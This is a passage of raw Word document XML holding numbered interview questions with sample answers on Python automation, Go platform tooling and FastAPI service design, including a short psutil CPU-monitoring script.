        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1481. Python context managers: How would you implement a context manager that acquires a distributed lock before running a destructive infrastructure operation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Implement __enter__ to acquire a lock (e.g. via Cloud Storage object generation preconditions, Firestore transaction, or a Redis SETNX with TTL) and raise if it cannot be obtained within a timeout, and __implement __exit__ to always release the lock even if the operation raised, using a try/finally internally. Add a lease TTL and heartbeat so a crashed process does not hold the lock forever and block future runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1482. Python CLI design: How would you design a Python CLI with argparse or Click that supports dry-run, environment selection, and confirmation prompts for risky actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Click for subcommands and typed options, add a global --dry-run flag that logs intended actions without executing them, and an --env flag validated against an allowlist (dev/staging/prod) to prevent typos from targeting the wrong environment. For destructive commands, require an explicit --yes flag or an interactive confirmation prompt that echoes back what will be changed before proceeding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1483. Python GCP client patterns: How would you handle pagination, quota errors, and exponential backoff when listing thousands of resources with GCP client libraries?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the client library's built-in pager (e.g. list_next or the iterator returned by list()) rather than manually tracking page tokens, and wrap calls in retry logic that backs off on 429/RESOURCE_EXHAUSTED responses using the Retry-After hint when present. Batch or throttle concurrent requests to stay under per-project quotas, and checkpoint progress so a long-running inventory job can resume instead of restarting from page one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1484. Python dependency management: How would you manage dependencies, lockfiles, and reproducible builds for an internal Python tool using pip-tools or Poetry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Declare direct dependencies in pyproject.toml and generate a fully pinned lockfile (poetry.lock or requirements.txt via pip-compile) so every install is reproducible across machines and CI. Run a scheduled job to check for outdated or vulnerable pinned versions, and rebuild the lockfile deliberately rather than letting versions drift silently between developer machines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1485. Python performance: A Python automation script that inventories thousands of GCP resources is too slow. How would you profile it and decide between async, threads, or multiprocessing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Profile first with cProfile or py-spy to confirm whether the bottleneck is I/O wait (network calls) or CPU-bound work, since the fix differs. For I/O-bound API calls, use asyncio with an async client (or a thread pool, since most GCP calls release the GIL during I/O) to run requests concurrently; reserve multiprocessing for genuinely CPU-bound post-processing like parsing or transforming large result sets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1486. Python mocking: How would you mock GCP and Kubernetes API responses in pytest to test error handling paths like throttling, timeouts, and permission denials?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use unittest.mock or pytest-mock to patch the client methods and return canned responses or raise the actual exception types (google.api_core.exceptions.ResourceExhausted, PermissionDenied, DeadlineExceeded) so tests exercise the real except branches. For the Kubernetes client, mock the ApiClient or use a fake client library, and write one test per failure mode to confirm retries, backoff, and error messages behave as intended without touching a real cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1487. Scripting experience: Do you have hands-on scripting experience? Which languages do you use most, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer names the specific languages used regularly (e.g. Python for automation and tooling, Bash for quick operational glue scripts, Go for CLIs or controllers) with a concrete example of what each was used for, rather than just listing languages. Explaining the reasoning - Python for its ecosystem and readability in larger automation, Bash for simple sequential operations - shows genuine hands-on judgment rather than a resume keyword list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1488. Python vs Bash: What is the difference between Python and Bash scripting, and when would you choose one over the other?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bash excels at short, linear scripts chaining existing command-line tools together with minimal logic - it's what's already available on virtually every Linux system with no setup. Python is better once a script needs real data structures, robust error handling, testability, or logic beyond simple sequential command execution, since Bash's string-based, loosely-typed model becomes unwieldy and hard to maintain past a certain complexity - the practical rule of thumb is to start in Bash for something under ~50 lines and reach for Python once it grows more complex than that.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1489. Task automation approach: How do you decide what to automate, and how do you approach automating a repetitive manual task?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prioritize automating tasks based on frequency and time cost - something done daily that takes 10 minutes is a better automation target than something done once a quarter that takes an hour, since the recurring cost compounds. When automating, start by understanding and documenting the manual process exactly as currently done, build in a dry-run mode and clear logging so the automated version is trustworthy and debuggable, and roll it out gradually (running alongside the manual process initially) rather than fully trusting it on the first run against production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1490. Python CPU monitor: Write a Python script that monitors and prints current CPU utilization at a regular interval.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: import psutil</w:t>
        <w:br/>
        <w:t>import time</w:t>
        <w:br/>
        <w:br/>
        <w:t>def monitor_cpu(interval=2):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    print("Monitoring CPU utilization (Ctrl+C to stop)")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        while True:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            cpu_usage = psutil.cpu_percent(interval=1)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print(f"Current CPU usage: {cpu_usage}%")</w:t>
        <w:br/>
        <w:t xml:space="preserve">            time.sleep(interval)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    except KeyboardInterrupt:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        print("Stopped monitoring.")</w:t>
        <w:br/>
        <w:br/>
        <w:t>if __name__ == "__main__":</w:t>
        <w:br/>
        <w:t xml:space="preserve">    monitor_cpu()</w:t>
        <w:br/>
        <w:t>This uses the psutil library (the standard cross-platform way to read system metrics in Python), calls the function so it actually runs, sleeps between readings so it doesn't busy-loop, and handles Ctrl+C gracefully so the script can be stopped cleanly rather than crashing with a raw traceback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1491. Go error handling: How does Go error handling work, and how would you structure errors in a production CLI or service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Go functions return an error as the last value instead of throwing exceptions; callers check `if err != nil` and decide whether to handle, wrap, or propagate it. Wrap errors with context using fmt.Errorf("doing X: %w", err) so the chain can be unwrapped and inspected with errors.Is/errors.As, define sentinel or typed errors for conditions callers need to branch on, and log or return errors at the boundary rather than at every layer to avoid duplicate noise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1492. Go HTTP service: How would you build a small Go HTTP service for health checks, metrics, and safe operational actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use net/http or a lightweight router to expose /healthz (liveness) and /readyz (readiness, checking real dependencies), and mount a /metrics endpoint using prometheus/client_golang for Prometheus scraping. Wrap the server with context-aware handlers, a request timeout middleware, and graceful shutdown via http.Server.Shutdown(ctx) on SIGTERM so in-flight requests finish before the process exits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1493. Go CLI design: How would you design a Go CLI with Cobra to audit Kubernetes or GCP resources across environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure the CLI with Cobra subcommands per resource type (pods, IAM, buckets), a persistent --env/--project flag validated against an allowlist, and a --dry-run mode for anything that mutates state. Use client-go or the GCP Go client libraries with context timeouts and structured output (table by default, --json for scripting), and return non-zero exit codes with clear error messages for CI integration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1494. Go operator: A team wants an operator to manage namespace onboarding with RBAC, quotas, and network policies. How would you approach it in Go?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build it with controller-runtime and a Custom Resource (e.g. NamespaceRequest) that captures the desired quotas, RBAC roles, and network policy template. The reconcile loop creates or updates the Namespace, ResourceQuota, RoleBindings, and NetworkPolicy objects to match the CR spec, uses owner references so cleanup happens on deletion, and reports status conditions so platform teams can see onboarding progress via kubectl.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1495. Go interfaces: How do interfaces help with testing cloud clients, Kubernetes clients, and business logic in Go?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define small interfaces around the external dependency (e.g. a GCSClient interface with just the methods you use) instead of depending on the concrete SDK type directly, then inject a fake or mock implementation in tests. This decouples business logic from network calls, makes table-driven tests fast and deterministic, and follows Go's convention of accepting interfaces and returning concrete types.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1496. Go testing: How would you write unit tests, table-driven tests, mocks, and integration tests for a Go platform tool?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use table-driven tests with a slice of input/expected-output cases run through t.Run subtests for clear failure reporting, and generate mocks for interfaces with mockgen or hand-written fakes to isolate business logic from external APIs. Keep true integration tests (hitting a real or emulated Kubernetes/GCP API) behind a build tag or short-mode skip so unit tests stay fast in normal CI runs, with integration tests running on a separate, slower pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1497. Go modules: How do Go modules, semantic versioning, dependency updates, and vulnerability scanning fit into enterprise engineering?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: go.mod pins direct and transitive dependency versions with semantic versioning, and go.sum verifies checksums for supply-chain integrity. Use `go get -u` deliberately (not blindly) to update dependencies, run `govulncheck` in CI to catch known vulnerabilities in the dependency graph, and vendor or mirror modules through an internal proxy (Artifact Registry) for reproducibility and to avoid depending on public registry availability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1498. Go observability: How would you add structured logs, Prometheus metrics, traces, and graceful shutdown to a Go service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use slog (or zap/zerolog) for structured JSON logging, prometheus/client_golang to expose request counters, latency histograms, and custom business metrics, and OpenTelemetry for distributed tracing across service calls. Handle SIGTERM/SIGINT with signal.NotifyContext, stop accepting new work, drain in-flight requests with a timeout, then exit cleanly so Kubernetes rolling updates do not drop traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1499. Go generics: How would generics help when writing reusable Kubernetes resource helpers, and where would you avoid using them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Generics let you write one function like Filter[T any](items []T, pred func(T) bool) []T that works across Pods, Deployments, or any typed slice without duplicating code or falling back to interface{} and type assertions. Avoid generics where a simple interface already expresses the behavior needed (e.g. io.Writer), or where the generic version adds cognitive overhead without meaningfully reducing duplication - Go favors clarity over cleverness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1500. Go context propagation: How would you propagate deadlines, cancellation, and request-scoped values across a Go service calling multiple downstream APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pass context.Context as the first argument through every function in the call chain, derive child contexts with context.WithTimeout for each downstream call so a slow dependency cannot exceed the overall budget, and cancel the parent context when the incoming request is done to stop in-flight work. Use context.WithValue sparingly, only for request-scoped metadata like trace IDs, never for optional parameters or dependency injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1501. Go gRPC: When would you choose gRPC over REST for a platform service, and what would you consider for versioning, streaming, and error handling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Choose gRPC for internal service-to-service communication where you want strongly typed contracts, efficient binary serialization, and native streaming (e.g. watching resource changes); prefer REST for public or browser-facing APIs where broad compatibility matters more. Version via package names in .proto files, design messages to be backward compatible (never reuse field numbers), and map gRPC status codes to meaningful errors rather than overloading a generic INTERNAL status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1502. Go worker pools: How would you design a bounded worker pool in Go to process a large batch of cloud resources while preserving per-item errors?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create a fixed number of worker goroutines reading from a buffered jobs channel, and a results channel (or a slice protected by a mutex) that captures each item's outcome including any error rather than failing the whole batch on the first error. Use a sync.WaitGroup to know when all workers are done, and a context to allow cancellation if the caller needs to abort early.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1503. Go profiling: A Go service has unexpected memory growth. How would you use pprof to find the leak and confirm the fix?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enable net/http/pprof on an internal-only port, capture heap profiles at two points in time under load with `go tool pprof -inuse_space`, and diff them to see which allocation call sites are growing. Common causes are goroutine leaks (check /debug/pprof/goroutine count over time), unbounded caches, or slices retaining large backing arrays; after the fix, re-profile under the same load to confirm memory stabilizes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1504. Go configuration: How would you manage configuration and secrets for a Go service across local, staging, and production without hardcoding values?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Load configuration from environment variables or a typed config struct populated via a library like envconfig/viper, with sane local defaults and required-value validation at startup so missing config fails fast rather than silently. Fetch secrets from Secret Manager at boot (never commit them or bake them into images), and keep environment-specific values in separate config files or env var sets per deployment target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1505. Go container builds: How would you build small, reproducible, multi-arch Docker images for a Go binary in CI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a multi-stage Dockerfile: build with `CGO_ENABLED=0 go build` in a golang base image, then copy only the static binary into a distroless or scratch final image to minimize size and attack surface. Use `docker buildx build --platform linux/amd64,linux/arm64` for multi-arch builds, pin the Go version and base image digests for reproducibility, and cache module downloads between builds to speed up CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1506. Go CRDs: How would you design a Custom Resource Definition and reconciliation loop for a Kubernetes operator that manages namespace onboarding?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define the CRD schema with a Spec (desired quotas, RBAC roles, network policy tier) and a Status (conditions, observed generation) using kubebuilder markers to generate the OpenAPI schema, then implement Reconcile() with controller-runtime to compare desired vs actual state and create/update the child resources idempotently. Use finalizers to clean up dependent resources on deletion, and requeue with backoff on transient errors rather than treating every reconcile failure as fatal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1507. FastAPI dependency injection: How would you use dependencies for authentication, database sessions, request context, and reusable validation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use FastAPI's Depends() to inject an auth dependency that validates a JWT/OAuth2 token and returns the current user, a database session dependency that yields a session and closes it after the request via a generator with try/finally, and shared validation dependencies (e.g. pagination params) reused across endpoints. Chain dependencies (a dependency can itself depend on others) to build layered checks like auth -&gt; tenant scoping -&gt; permission check without repeating logic per route.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1508. FastAPI database design: How would you manage database connections, migrations, transactions, pooling, and retries in a FastAPI app?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use SQLAlchemy (or an async ORM) with a connection pool sized to the expected concurrency and Cloud SQL connection limits, manage schema changes with Alembic migrations run in CI/CD before deploy, and wrap multi-statement operations in explicit transactions with rollback on error. Add retry logic for transient connection errors (e.g. Cloud SQL Auth Proxy reconnects) but never retry a transaction that already partially committed side effects outside the DB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1509. FastAPI background work: When would you use BackgroundTasks, Pub/Sub, Celery, Cloud Tasks, or a separate worker instead of doing work in the request path?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use BackgroundTasks only for short, best-effort work that can be lost on process restart (like sending a non-critical notification), since it runs in-process after the response is sent with no durability. For anything that must survive a crash or needs retries/scheduling - emails, report generation, downstream sync - use Pub/Sub or Cloud Tasks to hand off to a separate worker, which decouples request latency from the actual work and gives you durable retry semantics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1510. FastAPI testing: How would you test endpoints, dependencies, authentication, database behavior, and error paths using pytest and TestClient?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use FastAPI's TestClient (or httpx.AsyncClient for async tests) to call endpoints in-process without a real server, and override dependencies with app.dependency_overrides to inject fake auth or a test database session per test. Use a transactional test database (rollback after each test) or an in-memory/test container database for isolation, and write explicit tests for error paths - invalid input, missing auth, not-found - not just the happy path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1511. FastAPI rate limiting: How would you implement rate limiting and request throttling per client for a FastAPI service shared by multiple internal teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Implement a dependency or middleware that checks a token bucket or sliding-window counter keyed by client ID/API key, backed by Redis or Memorystore so limits are enforced consistently across multiple service replicas. Return 429 with a Retry-After header when the limit is exceeded, and expose per-client quota usage via a metrics endpoint so teams can see how close they are to their limit before it becomes an incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1512. FastAPI error handling: How would you design exception handlers and error response schemas so clients get consistent, actionable error payloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define a consistent error response schema (error code, message, optional field-level details) using a Pydantic model, and register custom exception handlers with @app.exception_handler() for domain exceptions and validation errors so every error - expected or unexpected - returns the same shape. Avoid leaking stack traces or internal details to clients in production; log the full exception server-side and return a sanitized message with a correlation ID clients can report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1513. FastAPI versioning: How would you version a FastAPI API without breaking existing consumers, and when would you deprecate an old version?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Version via URL prefix (/v1/, /v2/) or a header-based scheme, mounting versioned routers so old and new versions can run side by side. Introduce breaking changes only in a new version, keep the old version live with a documented deprecation timeline and a Deprecation/Sunset response header, and monitor usage metrics on the old version to know when it is safe to remove.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
